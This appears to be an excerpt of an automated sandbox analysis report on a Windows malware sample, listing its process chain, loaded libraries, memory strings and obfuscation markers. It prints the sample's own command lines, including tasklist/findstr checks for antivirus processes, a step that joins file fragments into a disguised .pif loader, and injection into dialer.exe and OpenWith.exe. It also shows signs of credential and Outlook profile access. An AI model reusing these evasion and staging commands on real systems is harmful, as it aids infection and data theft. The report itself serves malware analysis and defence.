Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 00000014.00000003.2377886629.000001BD77981000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378135994.000001BD77940000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377638858.000001BD77981000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: J2NWKU2oJi.exe Virustotal: Detection: 20%
Source: J2NWKU2oJi.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File read: C:\Users\user\Desktop\J2NWKU2oJi.exe
Source: unknown Process created: C:\Users\user\Desktop\J2NWKU2oJi.exe "C:\Users\user\Desktop\J2NWKU2oJi.exe"
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe "C:\Users\user\AppData\Local\Microsoft\Yuem.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: amsi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
Source: J2NWKU2oJi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbTSw source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.2.OpenWith.exe.1bd77939d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.2.OpenWith.exe.1bd77939d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D0D3E9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00D0D3E9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E3E4E push edi; iretd 16_3_027E3E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E5CD2 push dword ptr [edx+ebp+3Bh]; retf 16_3_027E5CDF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E3B74 pushad ; retf 16_3_027E3B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E4305 push F693B671h; retf 16_3_027E430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E45FC push esi; ret 16_3_027E4600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E21EF push ecx; iretd 16_3_027E21FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E0FCE push eax; retf 16_3_027E0FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E4FC8 push es; ret 16_3_027E4FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E21AF pushad ; ret 16_3_027E21B7
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6374CA0 push edx; ret 20_3_00007DF4B6374CAB
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6379D1E push esi; retf 000Ah 20_3_00007DF4B6379D1F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFED7C push ecx; ret 22_2_00CFED8F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D1F2BB push ss; iretd 22_2_00D1F2BC
